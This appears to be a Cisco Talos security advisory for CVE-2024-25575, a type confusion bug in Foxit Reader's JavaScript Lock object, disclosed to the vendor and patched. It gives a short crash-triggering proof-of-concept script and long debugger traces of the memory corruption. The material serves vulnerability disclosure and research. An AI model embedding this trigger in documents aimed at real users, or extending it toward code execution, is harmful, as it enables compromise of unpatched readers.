CVE-2024-25575
A type confusion vulnerability exists in the way Foxit Reader 2024.1.0.23997 handles a Lock object. Specially crafted JavaScript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site while the browser plugin extension is enabled.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Foxit Reader 2024.1.0.23997
Foxit Reader - https://www.foxitsoftware.com/pdf-reader/
8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-843 - Access of Resource Using Incompatible Type (‘Type Confusion’)
Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.
JavaScript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. A type confusion vulnerability exists in the way Foxit Reader handles the fields property of the Lock object. This can be illustrated by the following proof-of-concept code:
function main() {
    // Create a signature field and obtain its Lock object.
    var lock_object = app.activeDocs[0].addField('AA', "signature", 0, [10,214,3]).getLock();
    // deletePages() frees a large number of objects and replaces the Field the Lock refers to.
    app.activeDocs[0].deletePages();
    app.fs.transitions;
    // Touching the 'fields' property invokes the native getter, which uses the replaced object without type validation.
    lock_object.__defineGetter__('fields', function () {});
}
In the above code, getLock returns a Lock object that contains action and fields as lock properties. Next, the deletePages method is called, which in turn ends up freeing a large number of objects. It also resets the fields property of the Lock object and assigns it to a different object; the exact cause of this behaviour is unknown. Later, when the fields property of the Lock object is used in the getter without type validation, a type confusion occurs. We can observe the following in the debugger (with PageHeap enabled):
0:000> g
eax=072fe128 ebx=072fe194 ecx=02993220 edx=00000002 esi=10c2ef88 edi=15b68098
eip=02cd56e9 esp=072fe100 ebp=072fe140 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!FXJSE_GetClass+0x269:
02cd56e9 ffd1 call ecx {FoxitPDFReader!safe_vsnprintf+0x11f83f0 (02993220)} <-------------------------------------- (1)
0:000> t
eax=072fe128 ebx=072fe194 ecx=02993220 edx=00000002 esi=10c2ef88 edi=15b68098
eip=02993220 esp=072fe0fc ebp=072fe140 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!safe_vsnprintf+0x11f83f0:
02993220 55 push ebp
0:000> pc
eax=15b68098 ebx=072fe194 ecx=02993220 edx=00000002 esi=10c2ef88 edi=15b68098
eip=0299324b esp=072fe064 ebp=072fe0f8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x11f841b:
0299324b e8c0e23300 call FoxitPDFReader!FXJSE_Value_ToObject (02cd1510)
[...]
0:000> pc
eax=00000001 ebx=072fe194 ecx=072fe068 edx=00000001 esi=10c2ef88 edi=15b68098
eip=029934a8 esp=072fe060 ebp=072fe0f8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x11f8678:
029934a8 e8d33f3cff call FoxitPDFReader!safe_vsnprintf+0x5bc650 (01d57480)
0:000> pc
eax=072fe068 ebx=072fe194 ecx=0cf82020 edx=636f4c74 esi=10c2ef88 edi=15b68098
eip=029934b0 esp=072fe068 ebp=072fe0f8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x11f8680:
029934b0 e8ebd9eeff call FoxitPDFReader!safe_vsnprintf+0x10e6070 (02880ea0)
0:000> pc
eax=15b68098 ebx=072fe194 ecx=12b2a800 edx=072fe120 esi=10c2ef88 edi=15b68098
eip=029934c4 esp=072fe060 ebp=072fe0f8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0x11f8694:
029934c4 e8d7d90200 call FoxitPDFReader!safe_vsnprintf+0x1226070 (029c0ea0) ;<--------------------------------------- (2)
0:000> t
eax=15b68098 ebx=072fe194 ecx=12b2a800 edx=072fe120 esi=10c2ef88 edi=15b68098
eip=029c0ea0 esp=072fe05c ebp=072fe0f8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0x1226070:
029c0ea0 55 push ebp
[...]
0:000> p
eax=072fe038 ebx=072fe194 ecx=3d29bd01 edx=0cf670d8 esi=10c2ef88 edi=15b68098
eip=029c1088 esp=072fdfe0 ebp=072fe058 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200212
FoxitPDFReader!safe_vsnprintf+0x1226258:
029c1088 c645fc06 mov byte ptr [ebp-4],6 ss:002b:072fe054=05
0:000> p
eax=072fe038 ebx=072fe194 ecx=3d29bd01 edx=0cf670d8 esi=10c2ef88 edi=15b68098
eip=029c108c esp=072fdfe0 ebp=072fe058 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200212
FoxitPDFReader!safe_vsnprintf+0x122625c:
029c108c 8b4de8 mov ecx,dword ptr [ebp-18h] ss:002b:072fe040=186cf590
0:000> p
eax=072fe038 ebx=072fe194 ecx=186cf590 edx=0cf670d8 esi=10c2ef88 edi=15b68098
eip=029c108f esp=072fdfe0 ebp=072fe058 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200212
FoxitPDFReader!safe_vsnprintf+0x122625f:
029c108f 51 push ecx
0:000> p
eax=072fe038 ebx=072fe194 ecx=186cf590 edx=0cf670d8 esi=10c2ef88 edi=15b68098
eip=029c1090 esp=072fdfdc ebp=072fe058 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200212
FoxitPDFReader!safe_vsnprintf+0x1226260:
029c1090 8d4de0 lea ecx,[ebp-20h]
0:000> p
eax=072fe038 ebx=072fe194 ecx=072fe038 edx=0cf670d8 esi=10c2ef88 edi=15b68098
eip=029c1093 esp=072fdfdc ebp=072fe058 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200212
FoxitPDFReader!safe_vsnprintf+0x1226263:
029c1093 e8483afeff call FoxitPDFReader!safe_vsnprintf+0x1209cb0 (029a4ae0)
0:000> p
eax=0cf670d8 ebx=072fe194 ecx=072fe038 edx=0cf670d8 esi=10c2ef88 edi=15b68098
eip=029c1098 esp=072fdfdc ebp=072fe058 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200212
FoxitPDFReader!safe_vsnprintf+0x1226268:
029c1098 8bc8 mov ecx,eax
0:000> p
eax=0cf670d8 ebx=072fe194 ecx=0cf670d8 edx=0cf670d8 esi=10c2ef88 edi=15b68098
eip=029c109a esp=072fdfdc ebp=072fe058 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200212
FoxitPDFReader!safe_vsnprintf+0x122626a:
029c109a e8115cffff call FoxitPDFReader!safe_vsnprintf+0x121be80 (029b6cb0)
0:000> p
eax=0cf670d8 ebx=072fe194 ecx=186cf590 edx=0cf670d8 esi=10c2ef88 edi=15b68098
eip=029c109f esp=072fdfe0 ebp=072fe058 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200212
FoxitPDFReader!safe_vsnprintf+0x122626f:
029c109f 8d55e0 lea edx,[ebp-20h]
0:000> dd 0cf670d8 ;<--------------------------------------- (3)
0cf670d8 04cf3fac 3f800000 15d296e8 00000000
0cf670e8 102478c0 10247900 10247900 00000007
0cf670f8 00000008 00000000 00000000 00000000
0cf67108 3f800000 12bca3d8 00000000 15968138
0cf67118 15968178 15968178 00000007 00000008
0cf67128 3f800000 12d33e28 00000000 1307cc68
0cf67138 1307cca8 1307cca8 00000007 00000008
0cf67148 3f800000 15d6c250 00000000 10e7bbb8
0:000> dd 0cf670d8+98 ;<--------------------------------------- (4)
0cf67170 186cf590 186dff00 00000000 00000000
0cf67180 00000000 00000000 00000000 00000004
0cf67190 00000000 00000000 00000000 00000000
0cf671a0 00000000 00000000 00000000 00000000
0cf671b0 00000000 00000000 00000000 00000000
0cf671c0 00000000 00000000 00000000 00000000
0cf671d0 00000000 00000000 00000000 00000000
0cf671e0 00000000 00000000 00000000 00000000
0:000> dd 186cf590 ;<--------------------------------------- (5)
186cf590 00000000 00000000 0ed5b610 186cf560
186cf5a0 00000000 186beb48 00000000 00000001
186cf5b0 00000000 00000004 00000000 00000000
186cf5c0 00010006 186cf560 00000000 00000000
186cf5d0 00000000 186d28e0 00000010 00000002
186cf5e0 0cf6377c 0cf63758 0000000a 00000000
186cf5f0 00000001 00000010 00000010 00690054
186cf600 0065006d 00200073 006f0042 0064006c
0:000> g
eax=072fe128 ebx=072fe194 ecx=02904f80 edx=00000002 esi=16091920 edi=1608d378
eip=02cd56e9 esp=072fe100 ebp=072fe140 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!FXJSE_GetClass+0x269:
02cd56e9 ffd1 call ecx {FoxitPDFReader!safe_vsnprintf+0x116a150 (02904f80)} ;<--------------------------------------- (6)
0:000> g
Javascript::CFXJS_Lock::get_fields_static
eax=0cf642d0 ebx=0c38e338 ecx=3d29bdf1 edx=10c7cc08 esi=072fe0e0 edi=0f5f2098
eip=02996c56 esp=072fdf3c ebp=072fdfc8 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!safe_vsnprintf+0x11fbe26:
02996c56 837dec00 cmp dword ptr [ebp-14h],0 ss:002b:072fdfb4=0cf642d0
0:000> dd 186cf590 ;<--------------------------------------- (7)
186cf590 00000000 00000010 00000011 006e0055
186cf5a0 006f0063 00650076 00520072 00670069
186cf5b0 00740068 006f0044 006e0077 00000000
186cf5c0 00010006 186cf560 00000000 00000000
186cf5d0 00000000 186d28e0 00000010 00000002
186cf5e0 0cf6377c 0cf63758 0000000a 00000000
186cf5f0 00000001 00000010 00000010 00690054
186cf600 0065006d 00200073 006f0042 0064006c
At (1) above, the javascript::CFXJS_Field::getLock_static method is called. The getLock_static method calls javascript::Field::getLock at (2). getLock returns a Lock object, and its value can be observed at (3). The Lock object contains a Field object at offset 0x98, and the address of the Field object can be observed at (4). The javascript::CFXJS_Document::deletePages_static method is called at (6), which resets the Field object. The dereferenced contents of the vulnerable Field object can be observed before and after the call to deletePages_static at (5) and (7); the vulnerable object's type is different after the call to deletePages_static. The crash occurs when the vulnerable Field object is accessed without type validation. This can be observed in a debugger at the time of the crash:
0:000> p
eax=00520072 ebx=0c38e338 ecx=186cf590 edx=0c38e338 esi=072fe0e0 edi=0f5f2098
eip=029b133e esp=072fde58 ebp=072fdecc iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!safe_vsnprintf+0x121650e:
029b133e 8945d0 mov dword ptr [ebp-30h],eax ss:002b:072fde9c=0579f380
0:000> pc
eax=00000000 ebx=0c38e338 ecx=186cf590 edx=0cf670d8 esi=072fe0e0 edi=0f5f2098
eip=029b1365 esp=072fde54 ebp=072fdecc iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200297
FoxitPDFReader!safe_vsnprintf+0x1216535:
029b1365 e8261717ff call FoxitPDFReader!safe_vsnprintf+0x387c60 (01b22a90) ;<--------------------------------------- (8)
0:000> db ecx
186cf590 00 00 00 00 10 00 00 00-11 00 00 00 55 00 6e 00 ............U.n.
186cf5a0 63 00 6f 00 76 00 65 00-72 00 52 00 69 00 67 00 c.o.v.e.r.R.i.g.
186cf5b0 68 00 74 00 44 00 6f 00-77 00 6e 00 00 00 00 00 h.t.D.o.w.n.....
186cf5c0 06 00 01 00 60 f5 6c 18-00 00 00 00 00 00 00 00 ....`.l.........
186cf5d0 00 00 00 00 e0 28 6d 18-10 00 00 00 02 00 00 00 .....(m.........
186cf5e0 7c 37 f6 0c 58 37 f6 0c-0a 00 00 00 00 00 00 00 |7..X7..........
186cf5f0 01 00 00 00 10 00 00 00-10 00 00 00 54 00 69 00 ............T.i.
186cf600 6d 00 65 00 73 00 20 00-42 00 6f 00 6c 00 64 00 m.e.s. .B.o.l.d.
0:000> t
eax=00000000 ebx=0c38e338 ecx=186cf590 edx=0cf670d8 esi=072fe0e0 edi=0f5f2098
eip=01b22a90 esp=072fde50 ebp=072fdecc iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200297
FoxitPDFReader!safe_vsnprintf+0x387c60:
01b22a90 55 push ebp
0:000> p
eax=00000000 ebx=0c38e338 ecx=186cf590 edx=0cf670d8 esi=072fe0e0 edi=0f5f2098
eip=01b22a91 esp=072fde4c ebp=072fdecc iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200297
FoxitPDFReader!safe_vsnprintf+0x387c61:
01b22a91 8bec mov ebp,esp
0:000> p
eax=00000000 ebx=0c38e338 ecx=186cf590 edx=0cf670d8 esi=072fe0e0 edi=0f5f2098
eip=01b22a93 esp=072fde4c ebp=072fde4c iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200297
FoxitPDFReader!safe_vsnprintf+0x387c63:
01b22a93 8b5508 mov edx,dword ptr [ebp+8] ss:002b:072fde54=00000000
0:000> p
eax=00000000 ebx=0c38e338 ecx=186cf590 edx=00000000 esi=072fe0e0 edi=0f5f2098
eip=01b22a96 esp=072fde4c ebp=072fde4c iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200297
FoxitPDFReader!safe_vsnprintf+0x387c66:
01b22a96 85d2 test edx,edx
0:000> p
eax=00000000 ebx=0c38e338 ecx=186cf590 edx=00000000 esi=072fe0e0 edi=0f5f2098
eip=01b22a98 esp=072fde4c ebp=072fde4c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0x387c68:
01b22a98 7817 js FoxitPDFReader!safe_vsnprintf+0x387c81 (01b22ab1) [br=0]
0:000> p
eax=00000000 ebx=0c38e338 ecx=186cf590 edx=00000000 esi=072fe0e0 edi=0f5f2098
eip=01b22a9a esp=072fde4c ebp=072fde4c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0x387c6a:
01b22a9a 3b5118 cmp edx,dword ptr [ecx+18h] ds:002b:186cf5a8=00520072
0:000> p
eax=00000000 ebx=0c38e338 ecx=186cf590 edx=00000000 esi=072fe0e0 edi=0f5f2098
eip=01b22a9d esp=072fde4c ebp=072fde4c iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200297
FoxitPDFReader!safe_vsnprintf+0x387c6d:
01b22a9d 7d12 jge FoxitPDFReader!safe_vsnprintf+0x387c81 (01b22ab1) [br=0]
0:000> p
eax=00000000 ebx=0c38e338 ecx=186cf590 edx=00000000 esi=072fe0e0 edi=0f5f2098
eip=01b22a9f esp=072fde4c ebp=072fde4c iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200297
FoxitPDFReader!safe_vsnprintf+0x387c6f:
01b22a9f 83c110 add ecx,10h
0:000> p
eax=00000000 ebx=0c38e338 ecx=186cf5a0 edx=00000000 esi=072fe0e0 edi=0f5f2098
eip=01b22aa2 esp=072fde4c ebp=072fde4c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!safe_vsnprintf+0x387c72:
01b22aa2 3b5108 cmp edx,dword ptr [ecx+8] ds:002b:186cf5a8=00520072
0:000> p
eax=00000000 ebx=0c38e338 ecx=186cf5a0 edx=00000000 esi=072fe0e0 edi=0f5f2098
eip=01b22aa5 esp=072fde4c ebp=072fde4c iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200297
FoxitPDFReader!safe_vsnprintf+0x387c75:
01b22aa5 7d10 jge FoxitPDFReader!safe_vsnprintf+0x387c87 (01b22ab7) [br=0]
0:000> p
eax=00000000 ebx=0c38e338 ecx=186cf5a0 edx=00000000 esi=072fe0e0 edi=0f5f2098
eip=01b22aa7 esp=072fde4c ebp=072fde4c iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200297
FoxitPDFReader!safe_vsnprintf+0x387c77:
01b22aa7 8b4104 mov eax,dword ptr [ecx+4] ds:002b:186cf5a4=00650076
0:000> p
eax=00650076 ebx=0c38e338 ecx=186cf5a0 edx=00000000 esi=072fe0e0 edi=0f5f2098
eip=01b22aaa esp=072fde4c ebp=072fde4c iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200297
FoxitPDFReader!safe_vsnprintf+0x387c7a:
01b22aaa 8b0490 mov eax,dword ptr [eax+edx*4] ds:002b:00650076=498dffff ;<--------------------------- (9)
0:000> dd eax
00650076 498dffff ad00e8f0 45c6ffd2 8d8b06fc
00650086 fffffdb0 d2acf1e8 bc858bff bbfffffd
00650096 04fb8ccc fdb88d8b 8940ffff fffdbc85
006500a6 0fc13bff fffaa18c 85db33ff 665d7ec9
006500b6 1f0f6666 00000084 958d0000 fffffd8c
006500c6 93e8cb8b 8bffe703 7d979035 94353b05
006500d6 74057d97 94bd8b2e 57fffffd 17e8ce8b
006500e6 85ffd4df 8d1175c0 fffd8c85 97a8b9ff
0:000> p
eax=498dffff ebx=0c38e338 ecx=186cf5a0 edx=00000000 esi=072fe0e0 edi=0f5f2098
eip=01b22aad esp=072fde4c ebp=072fde4c iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200297
FoxitPDFReader!safe_vsnprintf+0x387c7d:
01b22aad 5d pop ebp
0:000> p
eax=498dffff ebx=0c38e338 ecx=186cf5a0 edx=00000000 esi=072fe0e0 edi=0f5f2098
eip=01b22aae esp=072fde50 ebp=072fdecc iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200297
FoxitPDFReader!safe_vsnprintf+0x387c7e:
01b22aae c20400 ret 4
0:000> p
eax=498dffff ebx=0c38e338 ecx=186cf5a0 edx=00000000 esi=072fe0e0 edi=0f5f2098
eip=029b136a esp=072fde58 ebp=072fdecc iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200297
FoxitPDFReader!safe_vsnprintf+0x121653a:
029b136a 8945d8 mov dword ptr [ebp-28h],eax ss:002b:072fdea4=00000000
[...]
0:000> p
eax=072fde6c ebx=0c38e338 ecx=072fde00 edx=072fde6c esi=072fe0e0 edi=0f5f2098
eip=029b138d esp=072fde54 ebp=072fdecc iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x121655d:
029b138d 8b4dd8 mov ecx,dword ptr [ebp-28h] ss:002b:072fdea4=498dffff
0:000> p
eax=072fde6c ebx=0c38e338 ecx=498dffff edx=072fde6c esi=072fe0e0 edi=0f5f2098
eip=029b1390 esp=072fde54 ebp=072fdecc iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x1216560:
029b1390 e84b18b3fd call FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x23730 (004e2be0)
0:000> t
eax=072fde6c ebx=0c38e338 ecx=498dffff edx=072fde6c esi=072fe0e0 edi=0f5f2098
eip=004e2be0 esp=072fde50 ebp=072fdecc iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x23730:
004e2be0 8b4108 mov eax,dword ptr [ecx+8] ds:002b:498e0007=???????? ;<--------------------------------------- (10)
0:000> dd 498dffff
498dffff ???????? ???????? ???????? ????????
498e000f ???????? ???????? ???????? ????????
498e001f ???????? ???????? ???????? ????????
498e002f ???????? ???????? ???????? ????????
498e003f ???????? ???????? ???????? ????????
498e004f ???????? ???????? ???????? ????????
498e005f ???????? ???????? ???????? ????????
498e006f ???????? ???????? ???????? ????????
0:000> u
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x23730:
004e2be0 8b4108 mov eax,dword ptr [ecx+8]
004e2be3 c3 ret
004e2be4 cc int 3
004e2be5 cc int 3
004e2be6 cc int 3
004e2be7 cc int 3
004e2be8 cc int 3
004e2be9 cc int 3
0:000> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 072fdecc 029c0374 3d29bdf9 0f5f2098 072fe0e0 FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x23730
01 072fdf28 02996ec7 0c38e338 072fdf70 00000000 FoxitPDFReader!safe_vsnprintf+0x1225544
02 072fdfc8 02cd5841 0f5f2098 072fdfec 0c38e338 FoxitPDFReader!safe_vsnprintf+0x11fc097
03 072fe008 02d4825a 072fe2d4 072fe094 072fe188 FoxitPDFReader!FXJSE_GetClass+0x3c1
04 072fe0e8 02d47e5b 072fe148 072fe188 072fe1bc FoxitPDFReader!CFXJSE_Arguments::GetValue+0x7249a
05 072fe120 02d641fc 072fe148 072fe188 00000000 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x7209b
06 072fe16c 02d697d9 072fe1ea 072f0001 072fe1bc FoxitPDFReader!CFXJSE_Arguments::GetValue+0x8e43c
07 072fe1d4 02d5fbda 072fe25c 10c7cc08 072fe2d0 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x93a19
08 072fe204 02edd58a 072fe25c 10c7cc08 072fe2d0 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x89e1a
09 072fe250 02edd633 072fe294 10c7cc08 072fe2d0 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x2077ca
0a 072fe27c 02edf8ab 072fe294 00000007 072fe2d8 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x207873
0b 072fe298 030db17b 00000007 072fe2d8 10c7cc08 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x209aeb
0c 072fe2b8 030771d9 3b242339 24fd208d 0000000e FoxitPDFReader!CFXJSE_Arguments::GetValue+0x4053bb
0d 072fe310 030771d9 24ffeb6d 156d1dc1 156d1e05 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1419
0e 072fe33c 03075860 24ffeb6d 3b2421b1 156d1dc1 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1419
0f 072fe354 03075689 00000000 00000000 00000002 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39faa0
10 072fe380 02d11f4e 10c7cc08 3b242339 156d1dc1 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39f8c9
11 072fe490 02d11a42 072fe624 10c7cc08 072fe4ec FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3c18e
12 072fe518 02cfa744 072fe624 10c7cc08 1583e984 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3bc82
13 072fe6c8 02cfa240 072fe764 1583e9a8 00000000 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24984
14 072fe6dc 02cd3c5f 072fe764 1583e9a8 3d298585 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24480
15 072fe754 02cd4596 1583e984 15ba5978 1583e970 FoxitPDFReader!FXJSE_Runtime_Release+0xeaf
16 072fe790 02878af7 131d04b8 186ba434 15ba5978 FoxitPDFReader!FXJSE_ExecuteScript+0x86
17 072fe848 0287a129 00000000 072fe8d8 072fe880 FoxitPDFReader!safe_vsnprintf+0x10ddcc7
18 072fe860 00bb20df 072fe8d8 072fe880 3d298a41 FoxitPDFReader!safe_vsnprintf+0x10df2f9
19 072fe890 00bb0fa4 1302d910 00000015 072fe8b8 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c69cf
1a 072fe8d0 00baf9d0 0ed397e8 10172188 1da9e708 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c5894
1b 072fe924 0049d322 072fe954 10172188 1da9e708 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c42c0
1c 072fe974 0071901b 00000000 3d299749 7fffffff FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x8852
1d 072ff598 03cb9713 00000000 00000000 3d2994b9 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x6194b
1e 072ff668 03cba8ec 00000429 00000000 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x199cc3
1f 072ff68c 03cb5292 00000429 00000000 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x19ae9c
20 072ff700 03cb5b05 101713d8 000a0990 00000429 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x195842
21 072ff720 750c120b 000a0990 00000429 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1960b5
22 072ff74c 750b81ca 03cb5ad1 000a0990 00000429 USER32!AddClipboardFormatListener+0x4b
23 072ff830 750b5f2a 03cb5ad1 00000000 00000429 USER32!GetClassLongW+0x7ba
24 072ff8a4 750b5cf0 00000329 072ff8cc 0069f324 USER32!DispatchMessageW+0x24a
25 072ff8b0 0069f324 0c3c8fe8 0c3c8fe8 057d98e8 USER32!DispatchMessageW+0x10
26 072ff8cc 0069f3e3 057d98e8 0069f350 ffffffff FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1dfe74
27 072ff8ec 040e29c2 00000000 0580550c 0710e000 FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1dff33
28 072ff904 03e9cef1 00250000 00000000 0c3653c4 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x5c2f72
29 072ff950 76ddfcc9 0710e000 76ddfcb0 072ff9bc FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x37d4a1
2a 072ff960 77247c6e 0710e000 8017ce93 00000000 KERNEL32!BaseThreadInitThunk+0x19
2b 072ff9bc 77247c3e ffffffff 77268c33 00000000 ntdll!RtlGetAppContainerNamedObjectPath+0x11e
2c 072ff9cc 00000000 03e9cfc0 0710e000 00000000 ntdll!RtlGetAppContainerNamedObjectPath+0xee
At (8), CPDF_FormField::GetControl is called. It takes the Field object as an argument and returns a Control object. However, the object passed is a string object rather than a Field object. When GetControl tries to get the Control object at (9), it dereferences the arbitrary value of the string object as a pointer. The crash does not occur here because that value happens to point into an allocated memory region. At (10), the crash occurs when ecx is dereferenced as if it were an object pointer. Depending on the memory layout of the process, it may be possible to gain arbitrary read and write access, which could ultimately be abused to achieve arbitrary code execution.
The vendor has provided updated versions.
2024-04-01 - Vendor Disclosure
2024-04-28 - Vendor Patch Release
2024-04-30 - Public Release
Discovered by KPC of Cisco Talos.